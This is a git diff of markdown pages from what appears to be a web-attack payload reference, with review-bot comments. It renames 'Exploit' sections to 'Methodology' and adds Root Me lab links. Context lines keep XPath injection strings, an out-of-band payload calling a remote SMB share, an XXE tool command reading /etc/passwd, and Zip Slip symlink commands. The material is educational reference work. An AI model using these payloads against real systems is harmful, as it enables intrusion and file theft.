diff --git a/Client Side Path Traversal/README.md b/Client Side Path Traversal/README.md
index d8bacf7..04901bd 100644
--- a/Client Side Path Traversal/README.md
+++ b/Client Side Path Traversal/README.md
@@ -65,6 +65,7 @@ Real-World Scenarios:
## Labs
* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT).
+* [Root Me - CSPT - The Ruler](https://www.root-me.org/en/Challenges/Web-Client/CSPT-The-Ruler)
## References
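Review bot: the new Root Me entry has no description while the existing doyensec/CSPTPlayground entry does, so the list reads inconsistently; add a short trailing description (for example what the challenge covers) or drop the description from both entries so the Labs list follows one format.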
diff --git a/Web Sockets/README.md b/Web Sockets/README.md
index 1936857..a62b25e 100644
--- a/Web Sockets/README.md
+++ b/Web Sockets/README.md
@@ -1,11 +1,12 @@
# Web Sockets
-> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server
+> WebSocket is a communication protocol that provides full-duplex communication channels over a single, long-lived connection. This enables real-time, bi-directional communication between clients (typically web browsers) and servers through a persistent connection. WebSockets are commonly used for web applications that require frequent, low-latency updates, such as live chat applications, online gaming, real-time notifications, and financial trading platforms.
+
## Summary
* [Tools](#tools)
-* [Exploit](#exploit)
+* [Methodology](#methodology)
* [Using wsrepl](#using-wsrepl)
* [Using ws-harness.py](#using-ws-harness-py)
* [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh)
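Review bot: the replacement intro quote is three sentences and runs noticeably longer than the one-line blockquotes used at the top of the other README files touched in this patch; consider trimming it to the first sentence, which already carries the definition, and keeping the use cases out of the quote. The Summary rename from `Exploit` to `Methodology` matches the heading change in the next hunk, which looks correct.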
@@ -19,7 +20,7 @@
* [mfowl/ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py)
-## Exploit
+## Methodology
### Using wsrepl
@@ -131,6 +132,7 @@ in order to add this header.
* [PortSwigger - Manipulating WebSocket messages to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-messages-to-exploit-vulnerabilities)
* [PortSwigger - Cross-site WebSocket hijacking](https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking/lab)
* [PortSwigger - Manipulating the WebSocket handshake to exploit vulnerabilities](https://portswigger.net/web-security/websockets/lab-manipulating-handshake-to-exploit-vulnerabilities)
+* [Root Me - Web Socket - 0 protection](https://www.root-me.org/en/Challenges/Web-Client/Web-Socket-0-protection)
## References
diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md
index 15c8b06..706678f 100644
--- a/XPATH Injection/README.md
+++ b/XPATH Injection/README.md
@@ -2,12 +2,14 @@
> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
+
## Summary
* [Tools](#tools)
-* [Exploitation](#exploitation)
-* [Blind exploitation](#blind-exploitation)
-* [Out Of Band Exploitation](#out-of-band-exploitation)
+* [Methodology](#methodology)
+ * [Blind exploitation](#blind-exploitation)
+ * [Out Of Band Exploitation](#out-of-band-exploitation)
+* [Labs](#labs)
* [References](#references)
## Tools
@@ -19,7 +21,7 @@
- [Harshal35/XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool
-## Exploitation
+## Methodology
Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"`
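Review bot: the unchanged context line directly under the renamed heading contains a typographic apostrophe (`password/text()=’`) instead of a straight `'` in the second string literal, which would not parse as XPath if copied; since this hunk already touches the line above it, it would be worth fixing the quote to `'` in the same change.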
@@ -42,7 +44,7 @@ search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
```
-## Blind Exploitation
+### Blind Exploitation
1. Size of a string
```sql
@@ -54,12 +56,20 @@ search=Har') and starts-with(../password,'c
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
```
-## Out Of Band Exploitation
+### Out Of Band Exploitation
```powershell
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
```
+
+## Labs
+
+* [Root Me - XPath injection - Authentication](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Authentication)
+* [Root Me - XPath injection - String](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-String)
+* [Root Me - XPath injection - Blind](https://www.root-me.org/en/Challenges/Web-Server/XPath-injection-Blind)
+
+
## References
- [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
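Review bot: the new Labs block leaves two consecutive blank lines before `## References`; one blank line is enough and matches the spacing used elsewhere in these files. Separately, the context block above it is fenced as ```powershell although it contains a plain HTTP URL with an XPath payload, so a neutral fence (no language, or `text`) would be more accurate.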
diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md
index 984ce88..25f6b5a 100644
--- a/XSLT Injection/README.md
+++ b/XSLT Injection/README.md
@@ -2,11 +2,11 @@
> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
+
## Summary
-- [Summary](#summary)
- [Tools](#tools)
-- [Exploit](#exploit)
+- [Methodology](#methodology)
- [Determine the vendor and version](#determine-the-vendor-and-version)
- [External Entity](#external-entity)
- [Read files and SSRF using document](#read-files-and-ssrf-using-document)
@@ -14,11 +14,18 @@
- [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper)
- [Remote Code Execution with Java](#remote-code-execution-with-java)
- [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
+- [Labs](#labs)
- [References](#references)
+
## Tools
-## Exploit
+No known tools currently exist to assist with XSLT exploitation.
+
+* [TODO](#)
+
+
+## Methodology
### Determine the vendor and version
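Review bot: the new Tools section says no known tools exist and then adds a `* [TODO](#)` placeholder that links nowhere; a dead placeholder link should not be committed, so either drop the bullet and keep the sentence, or leave the section out until a real entry exists. The two blank lines before `## Methodology` should also be collapsed to one.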
@@ -238,6 +245,11 @@ return proc.StandardOutput.ReadToEnd();
```
+## Labs
+
+- [Root Me - XSLT - Code execution](https://www.root-me.org/en/Challenges/Web-Server/XSLT-Code-execution)
+
+
## References
- [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
diff --git a/XSS Injection/3 - XSS Common WAF Bypass.md b/XSS Injection/3 - XSS Common WAF Bypass.md
index 878bbf4..ed7858f 100644
--- a/XSS Injection/3 - XSS Common WAF Bypass.md
+++ b/XSS Injection/3 - XSS Common WAF Bypass.md
@@ -1,5 +1,8 @@
# Common WAF Bypass
+> WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfuscate and modify their payloads to circumvent detection.
+
+
## Summary
* [Cloudflare](#cloudflare)
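Review bot: two blank lines are introduced between the new blockquote and `## Summary`; a single blank line is the convention used in the other README headers in this patch.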
@@ -9,6 +12,7 @@
* [WordFence WAF](#wordfence-waf)
* [Fortiweb WAF](#fortiweb-waf)
+
## Cloudflare
* 25st January 2021 - [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
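Review bot: the unchanged context line just below the added blank line reads `25st January 2021`, which should be `25th January 2021`; since this hunk is already editing whitespace in this spot, the ordinal could be corrected here as well.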
diff --git a/XSS Injection/4 - CSP Bypass.md b/XSS Injection/4 - CSP Bypass.md
index 8f86860..5012d0c 100644
--- a/XSS Injection/4 - CSP Bypass.md
+++ b/XSS Injection/4 - CSP Bypass.md
@@ -14,6 +14,7 @@
- [Bypass CSP script-src data](#bypass-csp-script-src-data)
- [Bypass CSP nonce](#bypass-csp-nonce)
- [Bypass CSP header sent by PHP](#bypass-csp-header-sent-by-php)
+- [Labs](#labs)
- [References](#references)
@@ -173,6 +174,15 @@ GET /?xss=&a&a&a&a&a&a&a&a...[REPEATED &a 1000 times]&a
Source: [@pilvar222](https://twitter.com/pilvar222/status/1784618120902005070)
+## Labs
+
+* [Root Me - CSP Bypass - Inline Code](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Inline-code)
+* [Root Me - CSP Bypass - Nonce](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce)
+* [Root Me - CSP Bypass - Nonce 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Nonce-2)
+* [Root Me - CSP Bypass - Dangling Markup](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup)
+* [Root Me - CSP Bypass - Dangling Markup 2](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-Dangling-markup-2)
+* [Root Me - CSP Bypass - JSONP](https://www.root-me.org/en/Challenges/Web-Client/CSP-Bypass-JSONP)
+
## References
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 40075ec..70c0992 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -2,9 +2,10 @@
> Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.
+
## Summary
-- [Vulnerability Details](#vulnerability-details)
+- [Methodology](#methodology)
- [Proof of Concept](#proof-of-concept)
- [Data Grabber](#data-grabber)
- [CORS](#cors)
@@ -38,10 +39,11 @@
- [Blind XSS endpoint](#blind-xss-endpoint)
- [Tips](#tips)
- [Mutated XSS](#mutated-xss)
+- [Labs](#labs)
- [References](#references)
-## Vulnerability Details
+## Methodology
Cross-Site Scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS allows attackers to inject malicious code into a website, which is then executed in the browser of anyone who visits the site. This can allow attackers to steal sensitive information, such as user login credentials, or to perform other malicious actions.
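Review bot: after renaming `## Vulnerability Details` to `## Methodology`, the first paragraph under the new heading is still a definition of XSS that largely duplicates the blockquote at the top of the file, so the section does not yet describe a methodology; consider folding that paragraph into the intro quote (or removing it) so the `Methodology` heading leads directly into the technique subsections listed in the Summary.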
@@ -556,6 +558,18 @@ Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Sea
## Labs
* [PortSwigger Labs for XSS](https://portswigger.net/web-security/all-labs#cross-site-scripting)
+* [Root Me - XSS - Reflected](https://www.root-me.org/en/Challenges/Web-Client/XSS-Reflected)
+* [Root Me - XSS - Server Side](https://www.root-me.org/en/Challenges/Web-Server/XSS-Server-Side)
+* [Root Me - XSS - Stored 1](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-1)
+* [Root Me - XSS - Stored 2](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-2)
+* [Root Me - XSS - Stored - Filter Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-Stored-filter-bypass)
+* [Root Me - XSS DOM Based - Introduction](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Introduction)
+* [Root Me - XSS DOM Based - AngularJS](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-AngularJS)
+* [Root Me - XSS DOM Based - Eval](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Eval)
+* [Root Me - XSS DOM Based - Filters Bypass](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based-Filters-Bypass)
+* [Root Me - XSS - DOM Based](https://www.root-me.org/en/Challenges/Web-Client/XSS-DOM-Based)
+* [Root Me - Self XSS - DOM Secrets](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-DOM-Secrets)
+* [Root Me - Self XSS - Race Condition](https://www.root-me.org/en/Challenges/Web-Client/Self-XSS-Race-Condition)
## References
diff --git a/XXE Injection/README.md b/XXE Injection/README.md
index f8457f3..c0d3ffe 100644
--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -2,10 +2,10 @@
> An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
+
## Summary
- [Tools](#tools)
-- [Labs](#labs)
- [Detect the vulnerability](#detect-the-vulnerability)
- [Exploiting XXE to retrieve files](#exploiting-xxe-to-retrieve-files)
- [Classic XXE](#classic-xxe)
@@ -35,6 +35,9 @@
- [XXE inside XLSX file](#xxe-inside-xlsx-file)
- [XXE inside DTD file](#xxe-inside-dtd-file)
- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
+- [Labs](#labs)
+- [References](#references)
+
## Tools
@@ -88,20 +91,6 @@
python ./otori.py --clone --module "G-XXE-Basic" --singleuri "file:///etc/passwd" --module-options "TEMPLATEFILE" "TARGETURL" "BASE64ENCODE" "DOCTYPE" "XMLTAG" --outputbase "./output-generic-solr" --overwrite --noerrorfiles --noemptyfiles --nowhitespacefiles --noemptydirs
```
-## Labs
-
-* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
- * [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
- * [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
- * [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
- * [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
- * [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
- * [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages)
- * [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
- * [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
- * [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
-* [GoSecure workshop - Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop)
-
## Detect the vulnerability
@@ -730,6 +719,22 @@ From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
]>cacat
```
+## Labs
+
+* [Root Me - XML External Entity](https://www.root-me.org/en/Challenges/Web-Server/XML-External-Entity)
+* [PortSwigger Labs for XXE](https://portswigger.net/web-security/all-labs#xml-external-entity-xxe-injection)
+ * [Exploiting XXE using external entities to retrieve files](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files)
+ * [Exploiting XXE to perform SSRF attacks](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-perform-ssrf)
+ * [Blind XXE with out-of-band interaction](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction)
+ * [Blind XXE with out-of-band interaction via XML parameter entities](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-interaction-using-parameter-entities)
+ * [Exploiting blind XXE to exfiltrate data using a malicious external DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-out-of-band-exfiltration)
+ * [Exploiting blind XXE to retrieve data via error messages](https://portswigger.net/web-security/xxe/blind/lab-xxe-with-data-retrieval-via-error-messages)
+ * [Exploiting XInclude to retrieve files](https://portswigger.net/web-security/xxe/lab-xinclude-attack)
+ * [Exploiting XXE via image file upload](https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload)
+ * [Exploiting XXE to retrieve data by repurposing a local DTD](https://portswigger.net/web-security/xxe/blind/lab-xxe-trigger-error-message-by-repurposing-local-dtd)
+* [GoSecure workshop - Advanced XXE Exploitation](https://gosecure.github.io/xxe-workshop)
+
+
## References
- [A Deep Dive into XXE Injection - Trenton Gordon - July 22, 2019](https://www.synack.com/blog/a-deep-dive-into-xxe-injection/)
diff --git a/Zip Slip/README.md b/Zip Slip/README.md
index 28ebe2b..c46f9e7 100644
--- a/Zip Slip/README.md
+++ b/Zip Slip/README.md
@@ -2,11 +2,12 @@
> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.
+
## Summary
* [Tools](#tools)
-* [Detection](#detection)
-* [Exploits](#exploits)
+* [Methodology](#methodology)
+ * [Detection](#detection)
* [Basic Exploit](#basic-exploit)
* [Additional Notes](#additional-notes)
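Review bot: `Detection` is indented under the new `Methodology` entry, but `Basic Exploit` and `Additional Notes` stay at the top level of the Summary even though the body hunk below demotes `### Basic Exploit` to a subsection of `## Methodology` by removing `## Exploits`; indent `* [Basic Exploit](#basic-exploit)` (and `Additional Notes`, if it is also a `###`) to the same level as `Detection` so the Summary mirrors the heading hierarchy.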
@@ -17,13 +18,13 @@
- [usdAG/slipit](https://github.com/usdAG/slipit) - Utility for creating ZipSlip archives
-## Detection
+## Methodology
+
+### Detection
Any ZIP upload page on the application.
-## Exploits
-
### Basic Exploit
Using [ptoomey3/evilarc](https://github.com/ptoomey3/evilarc):
@@ -39,6 +40,7 @@ ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
```
+
### Additional Notes
For affected libraries and projects, visit [snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)